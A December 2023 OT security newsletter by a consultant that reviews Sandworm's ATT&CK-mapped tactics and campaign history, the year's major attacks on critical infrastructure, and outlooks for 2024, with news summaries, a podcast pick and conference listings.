IT/OT Security News Update

1st of December 2023

Steven Lane, OT Security Consultant

This Week's Overall Theme: Reviewing 2023 and Looking Forward to 2024. Advanced Persistent Threats and OT Security.

TL;DR: This IT/OT Security Update highlights escalating cyber threats in operational technology. It covers sophisticated tactics by groups like Russia's Sandworm, increasing ransomware attacks on critical sectors, and potential new threats in 2024. Key incidents include attacks on Ukrainian infrastructure and a significant cyber attack in Denmark. The update also delves into the evolving nature of OT cyber threats, emphasising the need for robust cybersecurity measures to protect against these sophisticated and varied challenges.

The OT Security Landscape

The OT security landscape 2023 has been a complex tableau of evolving cyber threats, marked by sophisticated attacks with significant potential for physical harm. Advanced Persistent Threats (APTs) like the Russian-linked Sandworm team have showcased a strategic shift in cyber warfare tactics, using more streamlined, less detectable, and efficient methods. For instance, Sandworm's attack on Ukrainian critical infrastructure leveraged novel OT-level techniques, indicating an integration of cyber and kinetic warfare. These attacks, synchronised with mass missile strikes, caused unplanned power outages and showcased the severe potential for physical consequences.

In Denmark, the most significant cyber attack in the country's history targeted critical infrastructure, particularly exploiting vulnerabilities in Zyxel firewalls. These attacks, believed to involve multiple groups, including potentially Sandworm, forced many companies into 'island mode,' isolating from the internet to prevent further damage. The precision and coordination of these attacks implied a high level of resources and planning, underscoring the targeted nature of these threats against critical infrastructure.

Additionally, the OT environment faced diverse threats from ransomware groups targeting critical sectors like manufacturing, healthcare, and education. Groups like Royal, LockBit 3.0, BianLian, and Cl0p demonstrated a range of tactics, from double-extortion to data exfiltration-based extortion. These ransomware attacks have increasingly targeted Linux systems, including VMware ESXi servers, due to their critical role in services and sensitive data handling, leading to significant service outages and increased ransom pressure.

Revelations from the leaked Vulkan Files have exposed Russia's NTC Vulkan's involvement in developing offensive cyberwarfare tools, potentially targeting operational technology (OT) systems, including transportation networks. These documents, analysed by Mandiant and considered legitimate, detail the company's collaboration with Russian intelligence, particularly GRU Unit 74455, known as Sandworm. Key projects include Scan, Amesit (or Amezit), and Krystal-2B, with aims ranging from large-scale data collection to supporting coordinated attacks on OT environments, particularly transportation and utility systems. The Vulkan Files highlight Russia's strategic interest in critical infrastructure targets and underscore the growing need for robust cybersecurity measures in the OT sector, especially in transportation systems, which are increasingly vulnerable to sophisticated cyber threats.

One notable incident (March 2023) was the "SmoothOperator" supply chain attack linked to North Korean actors, which compromised the infrastructure of the 3CX Private Automatic Branch Exchange (PABX) software, affecting up to 600,000 companies. The company website states that 3CX has 12 million daily users in the automotive, food and beverage, hospitality, manufacturing and managed service sectors. Telecoms are critical to operational control rooms, with many of those services using voice-over-IP services. This attack demonstrated threat actors' innovative methods to exploit network access and distribute malware. This attack showed the potential for an attack at scale, and given the targets, OT was likely impacted. An attack like this could occur on a platform directly connected to OT, such as a cloud-based OT monitoring and alerting solution. We might expect an attack like that in 2024. I have a looming sense that this attack is overdue.

Collectively, these events highlight the evolving nature of OT cyber threats. The sophistication and strategic coordination of these attacks emphasise the need for robust cybersecurity strategies and heightened vigilance. As we look towards 2024, it is evident that OT security will continue to be a critical focus area, requiring advanced and vigilant cybersecurity strategies to protect critical infrastructure and mitigate the risk of physical consequences from cyberattacks.

Looking ahead to 2024, the landscape of operational technology (OT) security is expected to confront an array of advanced and increasingly sophisticated threats. A key trend will be the escalation of state-sponsored cyberattacks, potentially surging amid rising geopolitical tensions. These attacks will likely target data theft, IT infrastructure destruction, long-term espionage, and cyber sabotage, often with politically motivated objectives. Another emerging trend is increasing hacktivism, which has become more prevalent in geopolitical conflicts, often leading to false information and alert fatigue among cybersecurity professionals.

Exploiting vulnerabilities in commonly used software and appliances is a significant concern. The discovery of high and critical severity vulnerabilities, which sometimes receive limited research and delayed fixes, could pave the way for new, large-scale, and stealthy botnets capable of targeted attacks. Supply chain attacks may evolve, targeting smaller firms to breach major ones. Such attacks could lead to developments in dark web access market activities related to supply chains, enabling more efficient and large-scale attacks.

Hack-for-hire groups are on the rise, providing data theft services to clients ranging from private investigators to business rivals. This trend is expected to grow in the coming year, adding another layer of complexity to the OT security landscape. Additionally, despite modern security measures, kernel-level code execution barriers are increasingly being bypassed by APTs and cybercrime groups. Windows kernel attacks are on the rise, facilitated by abuses of the Windows Hardware Compatibility Program (WHCP) and the underground market for Extended Validation (EV) certificates and stolen code signing certificates.

These evolving threats in the OT landscape for 2024 highlight the need for robust and proactive cybersecurity measures. Organisations must enhance their defences against these sophisticated and varied cyber threats to protect critical infrastructure and maintain operational resilience. 2024 will need to see an uplift and acceleration of OT cyber transformation programs as we face a rapidly increasing threat landscape.

Sandworm: Russia’s Infamous Hacking Unit

This week, given all of the news headlines, I have been educating myself about Sandworm. I have read about this notorious APT in the past. Still, I decided to spend time reading more as they seem to keep hitting the headlines, and we are increasingly reading about sophisticated attacks on Electricity Grids worldwide.

Sandworm, a moniker derived from the fictional creature in Frank Herbert's "Dune," has become synonymous with state-sponsored cyber warfare. Traced to the Russian military intelligence service (GRU), this group's activities have significantly impacted geopolitical dynamics and highlighted the criticality of cybersecurity in national infrastructure.

Emerging in the shadows of the 2008 Russo-Georgian war, Sandworm's initial activities included spearphishing and exploitation of vulnerabilities. Their operations gained notoriety with the attacks on Ukraine’s power grid in 2015 and 2016, which marked the first known instance of a cyberattack causing a power outage. Their operations have evolved from cyber espionage to large-scale, politically motivated disruption, making them distinct among state-sponsored groups.

Tactics, Techniques, and Procedures (TTPs) of Sandworm

Using the Mitre ATT@CK page for Sandworm and other references, such as [1] [2], we can deduce some approaches they use to get into an organisation, often to attack Operational Technology. This does not cover every approach but is a view based on looking at the TTPs of attacks they have carried out, such as attacks on Ukrainian power.

Initial Access

Phishing (T1566): Sandworm primarily used spearphishing emails, often crafted to resemble those from trustworthy sources, to gain access to computers or account credentials. They also developed and tested spearphishing techniques to enhance their success.

Execution

Command and Scripting Interpreter (T1059): Sandworm heavily leveraged PowerShell commands and scripts for discovering system information, executing code, and downloading malware. They deployed malicious PowerShell scripts containing credential harvesting tools that operated only in memory, evading antivirus detection.

User Execution (T1204): Spearphishing emails often contained malware-laced documents requiring user execution for deployment.

Persistence

Valid Accounts (T1078): Sandworm obtained and used existing account credentials to maintain persistence in victim systems. They primarily deployed malware and hacking tools to control victim computers and networks.

Privilege Escalation

Valid Accounts (T1078): Sandworm utilised malware to escalate system privileges and identify other computers on the same network for potential compromise.

Defense Evasion

Indicator Removal on Host (T1070): The group obfuscated certain malware features, such as Olympic Destroyer (used by Sandworm Team against the 2018 Winter Olympics, held in Pyeongchang, South Korea), to hinder post-attack investigations. They also deleted data and cleared event logs to obscure their activities.

Masquerading (T1036): Sandworm attempted to emulate malware that other groups like Lazarus Group used to disguise their activities.

Credential Access

OS Credential Dumping (T1003): They dumped credentials from compromised machines to obtain login details and other credentials.

Unsecured Credentials (T1552): Customized malware incorporated usernames and passwords obtained from compromised machines before spreading further.

Discovery

File and Directory Discovery (T1083): Sandworm accessed and browsed files on compromised machines, searching for credential files and network configuration details.

Lateral Movement

Exploitation of Remote Services (T1210): The group exploited remote services to access internal systems, deploying malware for system privilege escalation, credential harvesting, and network movement.

Collection

File and Directory Discovery (T1083): After accessing victims’ computers, Sandworm performed functions to identify, collect, and package targeted data, including credentials and network information.

Command and Control

Data Obfuscation (T1001): Sandworm established command and control to create a single point of access between compromised networks and their server, allowing them to hide their activity and issue commands.

Exfiltration

Valid Accounts (T1078): Legitimate credentials were leveraged to exfiltrate data from victim networks and retrieve internal documents.

Impact

Defacement (T1491): Sandworm defaced websites and disrupted service following the compromise of a Georgian web hosting provider.

Inhibit System Recovery (T1490): Destructive malware was deployed to delete files, force shutdowns, and impede recovery, rendering computers inoperable.

Notable campaigns attributed to SandWorm.

Notable campaigns and events attributed to the Sandworm hacking group include:

• September 3, 2014: Spear-phishing campaign exploiting CVE-2014-4114 in Microsoft Office, targeting the Ukrainian government.
• December 23, 2015: Cyberattack against Ukrainian energy companies, causing power disruptions.
• December 17, 2016: Attack on the Ukrainian power grid, leading to a blackout in Kyiv.
• February 9, 2018: Cyberattack during the Winter Olympics opening ceremony in Pyeongchang, South Korea.
• October 19, 2020: Indictment of six Unit 74455 officers for various cybercrimes, including attacks on the 2018 Winter Olympics and the Parliament of Georgia.
• May 28, 2020: Exploitation of CVE-2019-10149 in Exim mail servers.
• February 2022: Release of the Cyclops Blink malware affecting routers and appliances.
• March 2022: Request to the International Criminal Court to consider war crimes charges against Russian hackers for attacks on Ukraine.
• April 2022: Attempted blackout in Ukraine using Industroyer2 malware.
• January 25, 2023: Attribution of a wiper malware targeting Active Directory to Sandworm.
• August 31, 2023: "Infamous Chisel" malware campaign targeting Android devices of the Ukrainian military.

Read more here and here (for example), but there is plenty on the internet to read. This MSc Dissertation is an exciting read, and this article is also interesting: This Is the New Leader of Russia’s Infamous Sandworm Hacking Unit.

Believe me you can spend hours going down this rabbit hole and reading about this APT!

Roundup

Here is a roundup of some key articles I have read this week.

Europe’s grid is under a cyberattack deluge, industry warns

The recent Politico article reports a worrying surge in cyberattacks on Europe's energy grid, with attacks doubling globally between 2020 and 2022. Industry leaders, alarmed by these attacks' increasing sophistication and frequency, emphasise the need for more robust cybersecurity defences. The attacks, primarily from Russia and other non-democratic nations, exploit the vulnerabilities presented by the digitisation of Europe's electricity networks. Despite new EU cybersecurity regulations for critical sectors, challenges persist, including outdated grid infrastructure and a shortage of cybersecurity experts, underscoring the urgent need for enhanced protection measures in the energy sector amidst growing geopolitical instability. [Read More]

Sandworm Disrupts Power in Ukraine Using a Novel Attack Against Operational Technology

Towards the end of 2022, Mandiant released a report detailing a highly complex cyber-physical incident in Ukraine. This incident was attributed to a Russian-linked threat actor known as Sandworm. The attack targeted critical infrastructure within Ukraine, utilising innovative techniques that impacted industrial control systems and operational technology. Initially, the Sandworm group employed Living Off the Land (LotL) techniques to disrupt substation circuit breakers, which resulted in power outages. This attack coincided with missile strikes that occurred across the region. Following this, a new CADDYWIPER variant was deployed in the victim's IT environment, showcasing the evolving sophistication and maturity of Russia's offensive operational technology capabilities. This attack is a stark reminder of Sandworm's ability to develop and adapt such capabilities quickly, posing a significant threat to global critical infrastructure that leverages similar systems, including Ukraine. [Read more]

CISA, and NCSC roll out guidelines for secure AI system development

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) and the U.K. National Cyber Security Centre (NCSC) have jointly released the 'Guidelines for Secure AI System Development'. Endorsed by 23 global cybersecurity organisations, these guidelines are significant in addressing the challenges of artificial intelligence (AI), cybersecurity, and critical infrastructure. They emphasise the importance of Secure-by-Design principles and cover the entire AI system development lifecycle, including secure design, development, deployment, and operation and maintenance. [Read more 1, 2]

Security News Update

Here are some things that have popped into my newsfeed and consciousness this week and interest me.

Cyber-attack closes hospital emergency rooms in three US states.

A recent cyberattack, a ransomware attack, has severely impacted Ardent Health Services, leading to the shutdown of emergency rooms in at least three states, including New Mexico, Texas, and Oklahoma. The attack, first detected on the morning of November 23, 2023, resulted in the shutdown of many of the company's computerised services. Ardent Health, responsible for overseeing 30 hospitals in the United States, had to divert some emergency room patients to other area hospitals and reschedule some non-emergent, elective procedures in response to the attack. The University of Kansas Health System St. Francis Campus in Topeka, Kansas, was put on "divert status" due to the cyberattack, affecting ambulance services, though the emergency room remained open. [Read more]

Attacks Against South African ICS and IoT Systems Steadily Decrease

In the third quarter of 2023, South Africa saw decreased cyberattacks targeting its industrial control systems (ICS) and Internet of Things (IoT) devices. According to Kaspersky's ICS CERT, 22% of South Africa's ICS were targeted by cyberattacks during this period. This represents a reduction compared to the first half of 2023, when 29.1% of ICS systems were affected. Additionally, the rate of attacks was lower than in 2022, when 38% of the Middle East, Turkey, and Africa ICS systems were attacked. Regarding IoT devices, 28% in South Africa contained malware, a significant proportion, though lower than in previous periods. Comparatively, 12% of Kenyan and 6% of Nigerian IoT systems had malware infections. [Read more]

Africa is among the regions with the highest number of detected attacks on industrial control systems (ICS computers).

Africa has been identified as the region with the highest detected attacks on Industrial Control Systems (ICS) computers in the first half of 2023. The attacks were detected on 40.3% of ICS computers across the continent, a higher percentage than any other region globally. This alarming figure indicates a significant vulnerability of African ICS infrastructures to cyber threats.

ICS computers are critical in various industries, including oil and gas, energy, automotive manufacturing, and building automation. They are crucial in operational technology functions, ranging from engineering workstations and operator consoles to supervisory control and data acquisition (SCADA) servers and human-machine interfaces (HMI). The cyberattacks targeting these systems are particularly dangerous because they can lead to material losses and production downtime and potentially physically harm the facilities they control. This, in turn, can severely impact a region's social welfare, ecology, and macroeconomics.

The types of cyber threats these African systems face include malicious scripts, spy trojans, worms, ransomware, and other forms of malware. Notably, in the first half of 2023, Africa had the highest percentage of ICS computers on which spyware was blocked (9.8%), compared to a global average of 6.1%. Furthermore, the continent also led in terms of ICS computers affected by attacks from denylisted internet resources (14.8%), which are typically associated with distributing or controlling malware. This figure surpasses the global average of 11.3%.

It is important to note that the threat landscape can vary significantly between countries and industries within Africa, influenced by differences in security maturity and the specific focus of threat actors. For instance, 29.1% of ICS computers in South Africa, 32.6% in Nigeria, and 34.5% in Kenya were affected by malware.

Viruses and worms spread across ICS networks through removable media, shared folders, infected files such as backups, and network attacks on outdated software. Africa experienced a high incidence of worm detections on ICS computers (7% compared to a 2.3% global average), making it the leader in terms of the percentage of ICS computers on which threats were detected following the connection of removable devices.

These findings underscore the urgent need for improved cybersecurity measures and awareness in Africa, especially in critical industries relying heavily on ICS and operational technology. [Read more] and [Read more].

Mideast Oil & Gas Facilities Could Face Cyber-Related Energy Disruptions

The oil and gas facilities in the Middle East could face significant disruptions due to cyber-related threats, particularly amidst the ongoing Israel-Gaza conflict. Security experts have raised concerns that the ongoing conflict could increase the vulnerability of the region's oil and gas operations to cyberattacks, potentially impacting global energy supplies. According to a report by S&P Global Ratings, the Middle East's gas industry is more susceptible to physical attacks than the oil sector, but both industries are at risk of cyberattacks. [Read more]

Idaho National Nuclear Lab Targeted in Major Data Breach

The data breach at Idaho National Laboratory (INL), which occurred on the night of November 19, 2023, was discovered the following day. A cyberattack from SiegedSec, a politically motivated hacking group, caused it. The breach targeted INL’s Human Resources application, part of the Oracle HCM system, a US federally approved vendor system outside the lab. This incident compromised sensitive employee information, including social security numbers, banking details, addresses, health care records, marital status, and termination information.

SiegedSec claimed responsibility for the hack and posted the stolen data on its Telegram social media account, where it remained for several days before being removed. The extent of the data breach is substantial, impacting thousands of current and former local workers. However, the number of people affected and the number of times the information was downloaded remain unknown.

INL has created a webpage to inform current and former employees about the breach and the steps they should take. The INL and law enforcement agencies are still investigating the full scope and impact of the breach. [Read more]

Podcasts to Listen to over the Weekend

Bletchley Park Podcast - E157 – Security & Insecurity Part 2

The episode E157, titled "Security & Insecurity Part 2" from Bletchley Park, is a follow-up to their tenth-anniversary episode E141. In the initial episode, the focus was on the crucial role of secrecy in wartime codebreaking, particularly its impact on operations at Bletchley Park and on the lives of the people working there. The follow-up episode, featuring Research Officer Dr. Thomas Cheetham and special guest Tony Comer, a former Departmental Historian at GCHQ, delves into the challenges of maintaining security in field operations. It highlights how signals intelligence, crucial in making life-and-death decisions at battlefronts, posed significant security challenges. The episode discusses the necessity of well-planned, flexible strategies and, importantly, the element of trust in the safe utilisation of Ultra intelligence. [Listen here]

Upcoming Conferences

1. ISC2 SECURE Asia Pacific, Date: 6 – 7 December 2023 Location: Singapore’s stunning Marina Bay Sands Convention Centre Details: ISC2 Security Registration: ISC2 Security.
2. Black Hat Europe 2023, Date: December 4-7, 2023 Location: ExCel London, United Kingdom Details: A significant event in the cybersecurity calendar, Black Hat Europe offers a range of sessions and workshops. Registration: Black Hat Europe 2023.
3. NICE K12 Cybersecurity Education Conference, Date: December 4-5, 2023 Location: Phoenix, Arizona Details: Focuses on cybersecurity education at the K12 level. Registration: NICE K12 Conference.
4. Cybersecurity Outlook 2024 Date: December 14, 2023 Format: Full-day virtual event Details: Co-hosted by Black Hat, Dark Reading, and Omdia, this event explores the cyber threats and technology trends for the coming year. Registration: Cybersecurity Outlook 2024.

Feedback

I'd like to hear what you think of this newsletter. This is a brain dump of how I keep up to speed and stay aware of threats, vulnerabilties, news, hacks and things that interest me. If you have feedback or ideas, please connect with me and send me a message.

Have a great week ahead!